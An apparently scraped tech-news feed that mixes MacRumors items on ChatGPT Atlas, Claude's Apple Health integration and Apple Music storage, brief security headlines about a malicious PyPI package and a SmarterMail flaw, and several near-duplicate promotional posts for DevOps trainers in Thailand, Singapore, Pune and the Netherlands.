hosang I.T.

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Tech

Tech Articles from a wide variety of topics and categories
OpenAI is rolling out another noteworthy update to ChatGPT Atlas, its AI-powered browser for Mac.


As per the release notes, the latest build introduces tab groups, allowing users to organize their browsing sessions more efficiently. The update also brings fixes for vertical tab "mini mode" and a simplified right-click context menu for tabs.

On the search front, Atlas now features an "Auto" mode that automatically switches between ChatGPT and Google depending on the query. The search results UI has also been refreshed with a new vertical layout that more prominently displays links in answers.

Elsewhere in this update, Safari users migrating to Atlas will now be prompted to install the iCloud passwords extension during onboarding. Other changes include a simplified address bar context menu, crash fixes, updated translations, and support for macOS keyboard text replacements on webpages.

Today's update follows the browser's first major update that came in November. That introduced vertical tabs, iCloud Passkey support, and Google as a default search engine option.

Atlas currently remains available only on macOS, but OpenAI has said Windows, iOS, and Android versions are coming.
Tag: ChatGPT
This article, "ChatGPT Atlas Gains Tab Groups, Auto Google/AI Search Switching" first appeared on MacRumors.com

Anthropic's Claude AI chatbot is gaining Apple Health integration, allowing the assistant to access users' health and fitness data directly from their iPhone.


The feature is rolling out in beta this week via the Claude iOS app, Anthropic announced as part of a broader healthcare push. U.S. subscribers on Claude Pro and Max plans can opt in to share their data, including movement, sleep, and activity patterns.

Once connected, Claude can summarize medical history, explain test results, detect patterns across fitness metrics, and help users prepare questions for doctor appointments. HealthEx and Function connectors are also available in beta.

Anthropic says the integrations are "private by design." Users choose exactly what they share, must explicitly opt in, and can revoke access at any time. Health data isn't used to train models, according to the company.

The announcement comes two weeks after OpenAI launched ChatGPT Health with its own Apple Health connector. Both companies stress their tools aren't intended for diagnosis and aren't a substitute for professional medical advice.
Tags: Anthropic, Apple Health
This article, "Claude AI iPhone App Can Now Connect to Apple Health in the US" first appeared on MacRumors.com

Introduction: Problem, Context & Outcome
Engineering teams across Thailand face increasing pressure to deliver software faster while keeping systems stable and secure. Many professionals learn DevOps tools individually, yet they struggle to connect those tools into one dependable delivery pipeline. As a result, deployments fail unexpectedly, environments drift, and release cycles slow down. Meanwhile, Thailand continues to expand its digital economy through fintech, e-commerce, cloud adoption, and enterprise modernization initiatives. These changes require DevOps skills that work in real production environments, not just in test setups. A DevOps Trainer in Thailand helps engineers move from fragmented knowledge to practical execution. This blog explains what a DevOps Trainer in Thailand does, why the role matters today, and how structured training improves delivery outcomes for teams and organizations.
Why this matters: Practical DevOps skills reduce operational risks and support reliable software delivery.
What Is a DevOps Trainer in Thailand?
A DevOps Trainer in Thailand is an experienced industry professional who teaches DevOps using real-world workflows and delivery scenarios. Instead of focusing only on tools, the trainer explains how development, operations, quality assurance, security, and cloud infrastructure function together throughout the software lifecycle. These trainers help developers understand how code flows from source control to production. They guide DevOps engineers in building scalable CI/CD pipelines. They support QA teams in implementing continuous and automated testing. They also assist cloud and operations teams with automation, monitoring, and observability. In Thailand, DevOps trainers often work with enterprises, startups, and global delivery teams. Their training aligns with Agile practices, cloud platforms, and DevSecOps requirements commonly used in modern projects.
Why this matters: Real-world training prepares teams to handle production challenges confidently.
Why a DevOps Trainer in Thailand Is Important in Modern DevOps & Software Delivery
Modern software delivery demands speed, resilience, and security at the same time. Organizations in Thailand release applications frequently while supporting growing users and evolving business needs. A DevOps Trainer in Thailand helps teams meet these expectations through structured DevOps practices. The trainer addresses common problems such as manual deployments, delayed feedback loops, unstable environments, and unclear responsibility between teams. In addition, DevOps training connects CI/CD pipelines with cloud infrastructure, Agile collaboration, and security automation. Without expert guidance, teams often adopt fragmented solutions that break under load. With proper training, teams create repeatable, scalable, and secure delivery systems.
Why this matters: Expert DevOps guidance enables predictable delivery and long-term stability.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Build shared ownership and accountability across teams.
How it works: Trainers promote transparency, collaboration, and continuous feedback.
Where it is used: Agile teams, enterprise programs, cross-functional delivery units.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and reliable releases.
How it works: Trainers explain pipeline stages, automated testing, quality checks, and deployments.
Where it is used: Cloud-native applications, SaaS products, enterprise systems.
Infrastructure as Code
Purpose: Standardize infrastructure and reduce configuration drift.
How it works: Trainers introduce version-controlled infrastructure concepts and repeatable environments.
Where it is used: AWS, Azure, and Google Cloud platforms.
Monitoring and Observability
Purpose: Detect issues early and improve reliability.
How it works: Trainers cover metrics, logging, alerting, and tracing strategies.
Where it is used: Production environments and Site Reliability Engineering teams.
DevSecOps Integration
Purpose: Shift security earlier into the delivery lifecycle.
How it works: Trainers integrate security scans and compliance checks into CI/CD pipelines.
Where it is used: Financial systems, regulated industries, enterprise platforms.
Why this matters: Strong core concepts create reliable and scalable DevOps foundations.
How a DevOps Trainer in Thailand Works (Step-by-Step Workflow)
A DevOps Trainer in Thailand follows a structured, outcome-driven approach. First, the trainer assesses existing delivery pipelines, tools, and team maturity. Next, the trainer introduces DevOps fundamentals using real operational challenges rather than theoretical models. Then, the trainer maps DevOps practices to the organization’s development, testing, and deployment lifecycle. Teams learn pipeline design, automation planning, and cloud deployment strategies. Monitoring and feedback guide improvements at every stage. Finally, the trainer helps teams document workflows and adopt continuous improvement practices that scale across projects.
Why this matters: A clear workflow ensures sustainable DevOps adoption and measurable progress.
Real-World Use Cases & Scenarios
Organizations throughout Thailand rely on a DevOps Trainer in Thailand to modernize software delivery. Fintech companies use trainers to build compliant CI/CD pipelines. E-commerce platforms depend on trainers to scale cloud infrastructure during traffic spikes. SaaS providers adopt DevOps training to increase release frequency and stability. Developers focus on build and deployment automation. QA teams implement continuous testing. DevOps engineers manage pipelines and infrastructure. SRE and cloud teams strengthen monitoring and incident response. These scenarios consistently lead to faster releases, fewer failures, and stronger system resilience.
Why this matters: Real-world scenarios demonstrate tangible business and delivery impact.
Benefits of Using a DevOps Trainer in Thailand
Productivity: Teams reduce manual work and shorten delivery cycles.
Reliability: Automation lowers deployment and runtime failures.
Scalability: Cloud-ready systems support growth smoothly.
Collaboration: Shared responsibility improves communication and alignment.
Why this matters: Clear benefits justify long-term DevOps investment.
Challenges, Risks & Common Mistakes
Teams sometimes treat DevOps as only a tooling initiative. Others automate too quickly without building strong foundations. Some delay monitoring until production issues arise. A DevOps Trainer in Thailand mitigates these risks by focusing on fundamentals, gradual adoption, and realistic expectations. The trainer also aligns DevOps practices with business goals and compliance requirements.
Why this matters: Awareness prevents wasted effort and unstable systems.
Comparison Table
Aspect | Traditional IT | Modern DevOps
Deployment | Manual | Automated
Release Frequency | Infrequent | Continuous
Team Structure | Siloed | Collaborative
Infrastructure | Static | Cloud-based
Testing | Manual | Automated
Scalability | Limited | Elastic
Monitoring | Reactive | Proactive
Security | Late-stage | Integrated
Recovery | Slow | Rapid
Feedback | Delayed | Continuous
Why this matters: The comparison clarifies why DevOps expertise is essential today.
Best Practices & Expert Recommendations
An effective DevOps Trainer in Thailand emphasizes fundamentals before complexity. Automation starts gradually while maintaining visibility and control. Monitoring begins early rather than after incidents occur. Documentation remains consistent and accessible. Furthermore, delivery pipelines align with business objectives and regulatory needs. This balanced approach supports long-term resilience and scalability.
Why this matters: Best practices reduce operational risk and future rework.
Who Should Learn From or Use a DevOps Trainer in Thailand?
Developers gain confidence in deployment and automation workflows. DevOps engineers refine CI/CD and infrastructure practices. Cloud engineers and SRE teams improve reliability and observability. QA teams adopt continuous testing models. Beginners build strong foundations, while experienced professionals optimize complex systems.
Why this matters: Broad relevance strengthens overall DevOps maturity.
FAQs – People Also Ask
What is a DevOps Trainer in Thailand?
A professional who teaches practical DevOps skills using real delivery workflows.
Why this matters: Clear definitions help learners make informed decisions.
Is DevOps training suitable for beginners?
Yes, trainers tailor learning paths based on experience levels.
Why this matters: Beginners learn progressively and confidently.
Do organizations in Thailand need DevOps trainers?
Yes, to scale delivery and reduce operational risk.
Why this matters: Scalability improves competitiveness.
How long does DevOps training take?
Duration depends on goals and current skill levels.
Why this matters: Planning sets realistic expectations.
Is DevOps relevant for startups?
Yes, it helps startups scale faster and avoid failures.
Why this matters: Early structure prevents future issues.
Do trainers cover cloud platforms?
Yes, AWS, Azure, and Google Cloud.
Why this matters: Cloud skills remain essential.
Is DevSecOps included in training?
Yes, security integrates directly into pipelines.
Why this matters: Early security reduces risk.
Can QA teams benefit from DevOps training?
Yes, through continuous testing and automation.
Why this matters: Early testing improves quality.
Does DevOps training improve system uptime?
Yes, automation and monitoring support reliability.
Why this matters: Reliability protects users.
Is DevOps a good career path in Thailand?
Yes, demand continues to grow across industries.
Why this matters: Skills remain future-ready.
Branding & Authority
DevOpsSchool operates as a globally trusted learning platform delivering enterprise-grade DevOps education with a strong execution focus. Through structured programs, DevOpsSchool supports professionals and organizations seeking a DevOps Trainer in Thailand with practical learning paths, proven frameworks, and scalable delivery approaches. Organizations trust this platform because it prioritizes outcomes, clarity, and sustainability.
Why this matters: Trusted platforms ensure consistent and credible skill development.
Rajesh Kumar serves as a senior mentor with more than 20 years of hands-on industry experience. Through Rajesh Kumar, learners gain expert guidance across DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentorship connects learning directly to enterprise execution.
Why this matters: Deep experience accelerates real-world DevOps mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore structured DevOps programs designed for professionals and teams building modern, scalable delivery systems.




A new malicious package discovered in the Python Package Index (PyPI) has been found to impersonate a popular library for symbolic mathematics to deploy malicious payloads, including a cryptocurrency miner, on Linux hosts. The package, named sympy-dev, mimics SymPy, replicating the latter's project description verbatim in an attempt to deceive unsuspecting users into thinking that they are
As an Apple Music subscriber, you're able to download songs, playlists, and albums from the Apple Music catalog to your iPhone or iPad for offline listening, but this can gradually eat up your device's storage space over time.


Fortunately the Music app includes a handy feature that can spring into action whenever your device's storage space runs low, and automatically offload songs you haven't played for a while in order to make space for newer ones.

It's called Optimized Storage, and here's how you can enable it.

1. Launch the Settings app on your iPhone or iPad.
2. Scroll down to the apps list and select Music.
3. Under Downloads, tap Optimized Storage.
4. Toggle the Optimized Storage switch to the "on" position so that it shows green.
5. Choose a minimum storage amount that you want to keep for music before downloaded songs start being removed from your device.

You can also monitor storage space by turning off automatic downloads and making sure to download new songs manually when needed. There's also an option to remove downloaded songs one by one from the Apple Music app if you prefer not to have songs offloaded by Apple automatically.
Tag: Apple Music
This article, "Cut Apple Music iPhone Storage Usage in Minutes – Here’s How" first appeared on MacRumors.com

Introduction: Problem, Context & Outcome
Engineering teams in Singapore increasingly struggle to balance speed, reliability, and compliance. Many professionals know DevOps tools in isolation, yet they fail to connect them into a dependable delivery pipeline. Consequently, deployments remain fragile, feedback stays slow, and operations turn reactive. At the same time, Singapore strengthens its position as a regional technology and financial center. Organizations now adopt cloud-native architectures, microservices, and continuous delivery at scale. This transformation raises the need for expert DevOps guidance rooted in real production environments. A DevOps Trainer in Singapore helps teams translate DevOps principles into actionable workflows that perform under real pressure. In this blog, you will understand the role of a DevOps Trainer in Singapore, why the role matters today, and how structured training drives predictable delivery success.
Why this matters: Clear DevOps direction improves stability, speed, and delivery confidence.
What Is a DevOps Trainer in Singapore?
A DevOps Trainer in Singapore is a practicing industry expert who teaches DevOps through hands-on, experience-driven learning. Rather than focusing only on tools, the trainer explains how development, operations, testing, security, and cloud infrastructure operate together as one system. These trainers help developers understand how source code moves through builds, tests, and deployments. They guide DevOps engineers in designing CI/CD pipelines. They enable QA teams to adopt continuous testing strategies. They also support cloud and operations teams in automation and observability. In Singapore’s enterprise-heavy environment, DevOps trainers often bring exposure from fintech, SaaS, banking, and large-scale platforms. Their training aligns closely with Agile delivery, cloud adoption, and DevSecOps practices used in real production systems.
Why this matters: Realistic training prepares teams for production challenges, not just theory.
Why a DevOps Trainer in Singapore Is Important in Modern DevOps & Software Delivery
Modern software delivery demands rapid change without compromising reliability or security. Organizations in Singapore deploy applications frequently while operating under strict compliance and uptime requirements. A DevOps Trainer in Singapore helps teams meet these demands through structured DevOps practices. The trainer addresses manual deployments, delayed feedback, unstable environments, and unclear ownership. Additionally, DevOps training connects CI/CD pipelines with cloud platforms, Agile collaboration, and security automation. Without expert guidance, teams often implement fragmented solutions that collapse at scale. With proper training, teams build repeatable, scalable, and secure delivery pipelines aligned with enterprise needs.
Why this matters: Expert training enables predictable delivery and long-term operational resilience.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Create shared ownership and accountability.
How it works: Trainers promote transparency, collaboration, and continuous feedback across teams.
Where it is used: Agile teams, enterprise programs, regulated environments.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and reliable software releases.
How it works: Trainers explain pipeline stages, automated tests, quality gates, and deployments.
Where it is used: Cloud-native applications, microservices, enterprise systems.
Infrastructure as Code
Purpose: Standardize and automate infrastructure provisioning.
How it works: Trainers introduce version-controlled infrastructure concepts.
Where it is used: AWS, Azure, and Google Cloud platforms.
Monitoring and Observability
Purpose: Detect issues early and improve system reliability.
How it works: Trainers cover metrics, logs, alerts, and tracing practices.
Where it is used: Production systems and Site Reliability Engineering teams.
DevSecOps Integration
Purpose: Shift security earlier in the delivery lifecycle.
How it works: Trainers embed security checks into CI/CD pipelines.
Where it is used: Financial services, government systems, enterprise platforms.
Why this matters: These core elements create resilient and scalable DevOps systems.
How a DevOps Trainer in Singapore Works (Step-by-Step Workflow)
A DevOps Trainer in Singapore follows a structured, outcome-focused workflow. First, the trainer evaluates existing processes, tools, and team maturity. Next, the trainer introduces DevOps fundamentals using real operational challenges. Then, the trainer maps DevOps practices to the organization’s development, testing, and deployment lifecycle. Teams learn pipeline design, automation strategies, and cloud deployment approaches. Monitoring and feedback guide improvements at each stage. Finally, the trainer helps teams document workflows and adopt continuous improvement models that scale across teams and projects.
Why this matters: Step-by-step learning ensures sustainable DevOps adoption.
Real-World Use Cases & Scenarios
Organizations across Singapore rely on a DevOps Trainer in Singapore to modernize delivery systems. Banks and fintech companies use trainers to build compliant CI/CD pipelines. SaaS firms depend on trainers to scale Kubernetes environments. Government teams adopt training to improve automation and reliability. Developers focus on build and deployment automation. QA teams introduce continuous testing. DevOps engineers manage pipelines and infrastructure. SRE and cloud teams enhance monitoring and incident response. These scenarios consistently lead to faster releases, fewer failures, and improved stability.
Why this matters: Real-world outcomes demonstrate clear business and delivery impact.
Benefits of Using a DevOps Trainer in Singapore
Productivity: Teams reduce manual effort and delivery delays.
Reliability: Automation minimizes deployment failures.
Scalability: Cloud-ready systems handle growth smoothly.
Collaboration: Shared responsibility improves team alignment.
Why this matters: Measurable benefits justify DevOps investment.
Challenges, Risks & Common Mistakes
Teams often treat DevOps as a tools-only initiative. Others automate too quickly without mastering fundamentals. Some delay monitoring until failures occur. A DevOps Trainer in Singapore reduces these risks by prioritizing foundations, gradual adoption, and realistic expectations. The trainer also aligns DevOps practices with compliance and business goals.
Why this matters: Awareness prevents wasted effort and unstable systems.
Comparison Table
Aspect | Traditional IT | Modern DevOps
Deployment | Manual | Automated
Release Frequency | Infrequent | Continuous
Team Structure | Siloed | Collaborative
Infrastructure | Static | Cloud-based
Testing | Manual | Automated
Scalability | Limited | Elastic
Monitoring | Reactive | Proactive
Security | Late-stage | Integrated
Recovery | Slow | Rapid
Feedback | Delayed | Continuous
Why this matters: Clear comparison explains the value of DevOps expertise.
Best Practices & Expert Recommendations
An effective DevOps Trainer in Singapore focuses on fundamentals before complexity. Automation begins gradually and remains visible. Monitoring starts early, not after incidents. Documentation stays consistent and accessible. Furthermore, delivery pipelines align with business objectives and regulatory requirements. This balanced approach supports resilience and scalability over time.
Why this matters: Best practices reduce operational risk and future rework.
Who Should Learn From or Use a DevOps Trainer in Singapore?
Developers gain clarity around deployments and automation. DevOps engineers refine CI/CD and infrastructure workflows. Cloud engineers and SRE teams improve reliability and observability. QA teams adopt continuous testing practices. Beginners build strong foundations, while experienced professionals optimize complex delivery systems.
Why this matters: Broad applicability strengthens organizational DevOps maturity.
FAQs – People Also Ask
What is a DevOps Trainer in Singapore?
A professional who teaches practical DevOps skills using real delivery workflows.
Why this matters: Clear understanding supports informed learning decisions.
Is DevOps training suitable for beginners?
Yes, trainers customize learning paths based on experience.
Why this matters: Beginners learn progressively and safely.
Do enterprises in Singapore require DevOps trainers?
Yes, to scale delivery while meeting compliance demands.
Why this matters: Scalability improves competitiveness.
How long does DevOps training take?
Training length depends on goals and current skills.
Why this matters: Planning sets realistic expectations.
Is DevOps important for fintech and banking?
Yes, it supports secure and reliable delivery models.
Why this matters: Security and stability remain critical.
Do trainers cover cloud platforms?
Yes, including AWS, Azure, and Google Cloud.
Why this matters: Cloud skills remain essential.
Is DevSecOps part of DevOps training?
Yes, security integrates directly into pipelines.
Why this matters: Early security reduces risk.
Can QA engineers benefit from DevOps training?
Yes, through continuous testing and automation.
Why this matters: Early testing improves quality.
Does DevOps training improve uptime?
Yes, monitoring and automation support reliability.
Why this matters: Reliability protects users.
Is DevOps a strong career path in Singapore?
Yes, demand continues to grow across industries.
Why this matters: Skills stay future-proof.
Branding & Authority
DevOpsSchool operates as a globally trusted education platform delivering enterprise-grade DevOps learning focused on execution. Through structured programs, DevOpsSchool supports professionals and enterprises searching for a DevOps Trainer in Singapore with practical learning paths, proven frameworks, and scalable delivery models. Organizations choose this platform because it emphasizes clarity, outcomes, and sustainability.
Why this matters: Trusted platforms ensure consistent and credible learning.
Rajesh Kumar serves as a senior mentor with more than 20 years of hands-on experience across global delivery environments. Through Rajesh Kumar, learners receive guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD, and automation. His mentoring connects learning directly to enterprise execution.
Why this matters: Deep expertise accelerates real-world mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore enterprise-ready DevOps programs designed for teams and professionals building modern, scalable delivery systems.




A new security flaw in SmarterTools SmarterMail email software has come under active exploitation in the wild, two days after the release of a patch. The vulnerability, which currently does not have a CVE identifier, is tracked by watchTowr Labs as WT-2026-0001. It was patched by SmarterTools on January 15, 2026, with Build 9511, following responsible disclosure by the exposure management
Introduction: Problem, Context & Outcome
Many engineering teams in Pune face difficulty when turning DevOps knowledge into reliable production outcomes. Although engineers understand individual tools, they often fail to connect them into a unified delivery pipeline. Consequently, releases become slow, environments drift, and operational issues increase. At the same time, Pune continues to evolve as a major technology and startup hub, where companies aggressively adopt cloud platforms, microservices, and continuous delivery models. This rapid growth creates a strong demand for skilled DevOps guidance rooted in real-world experience. DevOps Trainers in Pune address this challenge by helping professionals apply DevOps practices across the complete software lifecycle. In this blog, you will learn what DevOps Trainers in Pune actually do, why they matter in today’s delivery landscape, and how they create measurable improvement for teams and organizations.
Why this matters: Practical DevOps knowledge improves stability, speed, and delivery confidence.
What Are DevOps Trainers in Pune?
DevOps Trainers in Pune are industry professionals who teach DevOps through practical, experience-driven learning. Instead of focusing only on tools, they explain how development, operations, testing, security, and cloud infrastructure work together as one delivery system. These trainers guide learners through real CI/CD pipelines, automated deployments, monitoring strategies, and cloud operations. They help developers understand deployment flows. They enable operations teams to automate infrastructure. They support QA teams in continuous testing models. Pune-based DevOps trainers often bring strong exposure from IT services, startups, and global enterprises. Their training reflects real project demands and aligns closely with Agile practices, cloud adoption, and modern software delivery expectations.
Why this matters: Realistic training prepares engineers for production environments, not just interviews.
Why DevOps Trainers in Pune Are Important in Modern DevOps & Software Delivery
Modern software delivery demands rapid releases without sacrificing reliability or security. Organizations in Pune deploy applications at high speed while handling scale and compliance. DevOps Trainers in Pune help teams achieve this balance. They address issues such as manual deployments, slow feedback, environment inconsistencies, and weak collaboration. In addition, they connect DevOps learning with CI/CD pipelines, cloud platforms, Agile workflows, and DevSecOps principles. Without structured training, teams often implement fragmented solutions that break under real workloads. With experienced trainers, teams design stable, repeatable, and scalable delivery systems.
Why this matters: Proper training prevents failures and supports long-term delivery maturity.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Promote shared ownership and faster feedback cycles.
How it works: Trainers encourage collaboration, transparency, and continuous learning.
Where it is used: Agile teams, product-focused companies, enterprise environments.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and predictable software releases.
How it works: Trainers explain pipeline stages, automation flows, and release controls.
Where it is used: Cloud-native systems, microservices platforms, enterprise applications.
Infrastructure as Code
Purpose: Standardize and automate infrastructure management.
How it works: Trainers teach version-controlled infrastructure concepts.
Where it is used: AWS, Azure, and Google Cloud deployments.
Monitoring and Observability
Purpose: Detect issues early and maintain reliability.
How it works: Trainers cover metrics, logs, alerts, and tracing strategies.
Where it is used: Production operations and Site Reliability Engineering teams.
DevSecOps Integration
Purpose: Embed security within delivery pipelines.
How it works: Trainers integrate security checks into CI/CD workflows.
Where it is used: Financial, regulated, and enterprise-grade systems.
Why this matters: These core components build resilient and scalable DevOps foundations.
How DevOps Trainers in Pune Work (Step-by-Step Workflow)
DevOps Trainers in Pune follow a structured learning approach. First, they analyze existing delivery processes and team maturity. Next, they introduce DevOps fundamentals using real operational scenarios. Then, they map DevOps practices to the organization’s development and deployment lifecycle. Trainers guide teams through CI/CD pipeline design, infrastructure automation, and cloud deployment planning. Monitoring and feedback play a central role throughout each stage. Finally, trainers help teams document workflows and adopt continuous improvement practices that scale.
Why this matters: Structured learning ensures lasting adoption and measurable impact.
Real-World Use Cases & Scenarios
Many IT services companies in Pune rely on DevOps Trainers in Pune to standardize delivery across multiple client environments. Startups use trainers to build scalable CI/CD pipelines from the beginning. Fintech and SaaS organizations adopt DevOps training to ensure compliance and high availability. Developers focus on build and deployment automation. QA teams implement continuous testing. DevOps engineers manage infrastructure and pipelines. SRE and cloud teams improve observability and incident response. These scenarios consistently deliver faster releases and improved system stability.
Why this matters: Real use cases highlight clear business and delivery improvements.
Benefits of Using DevOps Trainers in Pune
Productivity: Teams reduce manual work and delivery delays
Reliability: Automation minimizes deployment errors
Scalability: Cloud-ready systems grow smoothly
Collaboration: Shared responsibility improves teamwork
Why this matters: Clear benefits strengthen DevOps return on investment.
Challenges, Risks & Common Mistakes
Teams sometimes treat DevOps as a tool-only initiative. Others rush automation without solid foundations. Some ignore monitoring until failures appear. DevOps Trainers in Pune help teams avoid these mistakes by prioritizing fundamentals, gradual adoption, and realistic goals. They align DevOps strategies with real business needs instead of trends.
Why this matters: Awareness prevents wasted effort and unstable systems.
Comparison Table
Aspect           Traditional IT   Modern DevOps
Deployment       Manual           Automated
Release Cycle    Slow             Continuous
Team Structure   Siloed           Collaborative
Infrastructure   Static           Cloud-based
Testing          Manual           Automated
Scalability      Limited          Elastic
Monitoring       Reactive         Proactive
Security         Late-stage       Integrated
Recovery         Slow             Rapid
Feedback         Delayed          Continuous
Why this matters: The comparison clarifies why DevOps skills remain essential.
Best Practices & Expert Recommendations
Effective DevOps Trainers in Pune emphasize clarity before complexity. They introduce automation gradually and promote strong visibility through monitoring. They encourage documentation and consistent processes. Moreover, they align DevOps pipelines with business and compliance goals. This balanced approach supports long-term scalability and reliability.
Why this matters: Best practices reduce operational risk and future rework.
Who Should Learn or Use DevOps Trainers in Pune?
Developers gain confidence in deployments and automation. DevOps engineers refine CI/CD and infrastructure workflows. Cloud and SRE teams improve reliability and monitoring strategies. QA teams adopt continuous testing practices. Beginners develop structured foundations, while experienced professionals optimize delivery systems.
Why this matters: Broad applicability strengthens overall DevOps maturity.
FAQs – People Also Ask
What are DevOps Trainers in Pune?
They provide hands-on DevOps training based on real workflows.
Why this matters: Clear understanding supports better learning decisions.
Is DevOps training beginner-friendly?
Yes, trainers adapt programs to experience levels.
Why this matters: Beginners learn safely and progressively.
Do organizations in Pune require DevOps trainers?
Yes, to scale delivery and maintain reliability.
Why this matters: Scalability improves competitiveness.
How long does DevOps training usually take?
It depends on goals and current skill levels.
Why this matters: Planning sets expectations.
Is DevOps useful for IT services companies?
Yes, it improves client delivery speed and quality.
Why this matters: Faster delivery builds trust.
Do trainers teach cloud platforms?
Yes, including AWS, Azure, and GCP.
Why this matters: Cloud expertise remains critical.
Is security included in DevOps training?
Yes, through DevSecOps practices.
Why this matters: Security reduces late risks.
Can QA engineers benefit from DevOps training?
Yes, through test automation and CI integration.
Why this matters: Early testing improves quality.
Does DevOps training improve uptime?
Yes, via automation and monitoring.
Why this matters: Reliability protects users.
Is DevOps a strong career path in Pune?
Yes, demand continues to rise.
Why this matters: Skills remain future-proof.
Branding & Authority
DevOpsSchool functions as a globally trusted platform that delivers enterprise-grade DevOps education with a strong focus on real-world execution. Through structured programs, DevOpsSchool supports professionals and organizations seeking DevOps Trainers in Pune by offering practical learning paths, proven methodologies, and scalable delivery frameworks. Organizations trust this platform because it prioritizes outcomes over theory.
Why this matters: Trusted platforms ensure consistent and credible skill development.
Rajesh Kumar serves as a senior mentor with more than 20 years of hands-on experience across global delivery environments. Through Rajesh Kumar, learners gain guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD, and automation. His mentorship bridges learning and real enterprise execution.
Why this matters: Deep experience accelerates practical mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore enterprise-ready DevOps programs designed for professionals and organizations scaling modern delivery pipelines.
Introduction: Problem, Context & Outcome
Engineering teams across the Netherlands face a common challenge. They understand individual DevOps tools, yet they struggle to connect them into a reliable delivery system. Many professionals learn DevOps through fragmented tutorials. As a result, real production issues remain unresolved. Pipelines break. Releases slow down. Operations become reactive instead of proactive. At the same time, Dutch enterprises rapidly adopt cloud-native platforms, Kubernetes, and continuous delivery models. This shift increases demand for experienced DevOps Trainers in Netherlands who teach beyond theory. These trainers help teams apply DevOps in real business environments. This blog explains who DevOps Trainers in Netherlands are, how they operate, and why they matter in modern software delivery. You will also gain clarity on benefits, use cases, risks, and best practices.
Why this matters: Practical DevOps guidance reduces failure and speeds up enterprise transformation.
What Are DevOps Trainers in Netherlands?
DevOps Trainers in Netherlands are seasoned industry professionals who teach DevOps using real delivery scenarios. They focus on how development, operations, security, and quality work together as one continuous workflow. Unlike generic instructors, these trainers bring hands-on experience from enterprise environments. They guide learners through CI/CD pipelines, cloud infrastructure, automation strategies, and monitoring practices. Their training style emphasizes understanding over memorization. They help developers see how code moves to production. They help operations teams embrace automation and observability. DevOps Trainers in Netherlands support individual learners, startups, and large enterprises. They align training with modern Agile and cloud-native delivery models used across Dutch and global organizations.
Why this matters: Hands-on training converts DevOps concepts into production-ready skills.
Why DevOps Trainers in Netherlands Are Important in Modern DevOps & Software Delivery
Modern software delivery demands speed without sacrificing reliability. Organizations release features continuously while maintaining uptime and security. DevOps Trainers in Netherlands help teams achieve this balance. They teach structured pipelines, automated testing, and scalable infrastructure practices. Without expert training, teams misuse tools or copy incomplete solutions. This leads to fragile systems and frequent incidents. Trainers help organizations standardize DevOps workflows aligned with Agile and cloud adoption strategies. As companies in the Netherlands scale globally, trained DevOps professionals enable consistent delivery and reduced operational risk.
Why this matters: Expert training strengthens delivery stability and long-term scalability.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Create shared responsibility and faster feedback.
How it works: Trainers promote collaboration, shared metrics, and continuous learning.
Where it is used: Agile teams, product organizations, enterprise platforms.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and reliable releases.
How it works: Trainers explain pipeline stages, automated testing, and controlled deployments.
Where it is used: Cloud applications, microservices, enterprise systems.
Infrastructure as Code
Purpose: Manage infrastructure consistently.
How it works: Trainers introduce version-controlled infrastructure concepts.
Where it is used: AWS, Azure, Google Cloud deployments.
Monitoring and Observability
Purpose: Maintain system health and visibility.
How it works: Trainers teach metrics, logs, alerts, and tracing strategies.
Where it is used: Production systems and SRE operations.
DevSecOps Integration
Purpose: Build security into delivery pipelines.
How it works: Trainers embed security checks early in CI/CD workflows.
Where it is used: Regulated industries and large-scale platforms.
Why this matters: Core DevOps principles create stable and scalable delivery foundations.
How DevOps Trainers in Netherlands Work (Step-by-Step Workflow)
DevOps Trainers in Netherlands follow a structured and practical workflow. They begin by assessing current DevOps maturity and existing bottlenecks. Next, they introduce core DevOps concepts using real-life delivery problems. They then map DevOps practices to the organization’s development lifecycle. Trainers guide teams through pipeline design, automation planning, and deployment strategies. Continuous monitoring and feedback play a key role throughout the process. Finally, trainers help teams document workflows and adopt continuous improvement habits.
Why this matters: A clear workflow ensures consistent learning and measurable progress.
Real-World Use Cases & Scenarios
Dutch enterprises often hire DevOps Trainers in Netherlands to modernize legacy systems. Financial institutions rely on trainers to build compliant CI/CD pipelines. SaaS companies use trainers to scale Kubernetes clusters and automate monitoring. Developers learn build automation. QA teams implement automated testing. SREs strengthen reliability and incident response. Across sectors, DevOps training improves delivery speed and system resilience.
Why this matters: Real use cases prove tangible business value.
Benefits of Using DevOps Trainers in Netherlands
Productivity: Teams reduce manual effort and delays
Reliability: Automated pipelines lower failure rates
Scalability: Cloud-ready systems grow efficiently
Collaboration: Shared ownership improves alignment
Why this matters: Clear benefits justify strategic DevOps investment.
Challenges, Risks & Common Mistakes
Organizations often expect tools to solve cultural issues. Others adopt too many tools too quickly. Some teams ignore monitoring during early stages. DevOps Trainers address these risks by focusing on fundamentals and gradual adoption. They emphasize simplicity and business alignment.
Why this matters: Awareness prevents wasted time and failed transformations.
Comparison Table
Aspect           Traditional IT   Modern DevOps
Deployment       Manual           Automated
Release Cycle    Slow             Continuous
Collaboration    Siloed           Unified
Infrastructure   Static           Cloud-based
